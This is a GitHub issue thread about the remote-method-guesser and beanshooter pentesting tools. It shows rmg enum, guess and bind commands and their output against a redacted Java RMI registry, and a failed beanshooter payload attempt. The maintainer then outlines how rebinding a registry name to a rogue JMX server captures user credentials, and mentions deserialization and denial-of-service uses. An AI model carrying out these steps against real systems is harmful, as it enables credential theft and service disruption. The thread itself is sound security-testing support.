### ISSUE TITLE
RMG And beanshooter on bind operations

### ISSUE THREAD

**Issue by dinosn** [qtc-de/remote-method-guesser#64]
Hi, 
  I hope all is well.  On one of the tests I have encountered the following issue, where I'm wondering if i'm doing something wrong on my end as I never succeeded with bind so far. 

The java-RMI endpoint, originally will show the following
```
root@system:~/tools/rmi/remote-method-guesser# rmg enum 10.22.xx.xx 1099
[+] RMI registry bound names:
[+]
[+] 	- rmi://localhost:1099/DELL_KVMiloXX_5900_5900_abcdefg
[+] 		--> com.avocent.app.k.i_Stub (unknown class)
[+] 		    Endpoint: 10.22.xxx.xxx:38365  CSF: RMISocketFactory  ObjID: [-2a340344:18e09fb1829:-7fff, 2678333880810721886]
...
```

On a guess attempt we have something as below:
```
root@system:~/tools/rmi/remote-method-guesser# java2 -jar rmg-5.0.0-jar-with-dependencies.jar guess 10.22.xxx.xxx 1099 
[+] Reading method candidates from internal wordlist rmg.txt
[+] 	752 methods were successfully parsed.
[+] Reading method candidates from internal wordlist rmiscout.txt
[+] 	2550 methods were successfully parsed.
[+]
[+] Starting Method Guessing on 3281 method signature(s).
[+]
[+] 	MethodGuesser is running:
[+] 		--------------------------------
[+] 		[ rmi://localhost:1099/DELL_KVMiloXX_5900_5900_abcdefg ] HIT! Method with signature String getProperty(String property) exists!
[+] 		[3281 / 3281] [#####################################] 100%
[+] 	done.
[+]
[+] Listing successfully guessed methods:
[+]
[+] 	- rmi://localhost:1099/DELL_KVMiloXX_5900_5900_abcdefg
[+] 		--> String getProperty(String property)
...
```

Executing a bind request, 
```
java2 -jar rmg-5.0.0-jar-with-dependencies.jar bind 10.22.xxx.xxx 1099 localhost:2099 object1 --localhost-bypass
```

Will deliver the message, 
```
[+] Binding name object1 to javax.management.remote.rmi.RMIServerImpl_Stub
[+]
[+] 	Encountered no Exception during bind call.
[+] 	Bind operation was probably successful.
```

A new guess request now will show also the results,
```
root@system:~/tools/rmi/remote-method-guesser# java2 -jar rmg-5.0.0-jar-with-dependencies.jar guess 10.22.xxx.xxx 1099 
[+] Reading method candidates from internal wordlist rmg.txt
[+] 	752 methods were successfully parsed.
[+] Reading method candidates from internal wordlist rmiscout.txt
[+] 	2550 methods were successfully parsed.
[+]
[+] Starting Method Guessing on 3281 method signature(s).
[+]
[+] 	MethodGuesser is running:
[+] 		--------------------------------
[+] 		[ rmi://localhost:1099/DELL_KVMiloXX_5900_5900_abcdefg ] HIT! Method with signature String getProperty(String property) exists!
[+] 		[3281 / 3281] [#####################################] 100%
[+] 	done.
[+]
[+] Listing successfully guessed methods:
[+]
[+] 	- rmi://localhost:1099/DELL_KVMiloXX_5900_5900_abcdefg
[+] 		--> String getProperty(String property)
[+] 	- object1
[+] 		--> String getVersion()
[+] 		--> javax.management.remote.rmi.RMIConnection newClient(Object params)
```

At this point I'm with the impression that I can call beanshooter and proceed on a tonka, or other mlet deployment but all attempts will lead to a response as below:

```
root@system:~/tools/rmi/remote-method-guesser# java2 -jar ../beanshooter/beanshooter-4.1.0-jar-with-dependencies.jar standard 10.22.xxx.xxx 1099 tonka --bound-name object1
[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[-] Caught java.rmi.NoSuchObjectException while invoking the newClient method.
[-] You probably specified an ObjID value that does not exist on the server.
[-] Cannot continue from here.

```

An idea or suggestion on which action might be done wrong is appreciated!

Regards,
Nicolas

**Comment by qtc-de** [comment]
Hi Nicolas :wave: 

I guess you misunderstand the `bind` action. The `bind` action only create a new entry within the RMI registry. It is like creating a new DNS record within a DNS server. The record itself does not have any logic. With your request above you just tell the registry: `Please tell clients that ask for object1 that it is listening on localhost:2099` 

In contrast to DNS, the RMI registry also wants to know which type of object is listening on the newly registered endpoint. *remote-method-guesser* uses the type of an JMX server here by default, since this type is usually present within each JRE. So we can extend the above example like this:  `Please tell clients that ask for object1 that it is listening on localhost:2099 and that this endpoint hosts a JMX server`

When using the `guess` action, *remote-method-guesser* skips known object types. In your example above, *rmg* asks the registry: `What is object1?` and the registry answers `object1 is a JMX server listening on localhost:2099`. Instead of guessing methods *rmg* thinks `I know which methods JMX supports` and displays them as outcome. So in your output above, there is no real JMX server :upside_down_face:

**Comment by dinosn** [comment]
Hi! 
   Thank you for your response, it's somewhat more clear now, but I'm now failing to understand the need of a bind action.  In the example, https://github.com/qtc-de/remote-method-guesser?tab=readme-ov-file#bind-rebind-and-unbind , there is no further use of the bind-ed 'my-object' object entry.

Could it be possible to provide an example with the bind action as to it's relevance and / or possible further interactions with it?

Regards,
Nicolas

**Comment by qtc-de** [comment]
Sure :)

The `bind` action could be used to exploit client systems that are actually using the registry. As already mentioned, the RMI registry is like a DNS server. Therefore, it provides basically the same attack possibilities as a compromised DNS server would allow you.

So imagine that you encounter an RMI registry that has an actual JMX service bound. The JMX service is well protected and requires password authentication. Using the `bind`/`unbind`/`rebind` action you could now:

1. Unbind the actual boundname `jmxrmi` that points to `10.10.1.54`
2. Bind a new boundname `jmxrmi` that points to your system
3. Open a [rogue-jmx](https://github.com/qtc-de/remote-method-guesser#roguejmx) server
4. Wait for an user/bot to sign in into JMX
5. Capture the credentials
6. Recover the original bound name
7. Login into JMX

This is just one example. Since Java RMI is based on serialized Java objects, you could also attempt deserialization attacks on incoming clients. And of course `unbind` could be used for denial of service attacks.

During regular pentests exploitation is probably difficult, as you always have the risk of breaking something and are always dependent on other client systems doing something interesting during your test interval :shrug:

**Comment by dinosn** [comment]
Hi, 
   Thank you for the detailed explanation, maybe something that can be added on the readme as well, I believe it will assist many.

Have a great time.

Regards,
Nicolas
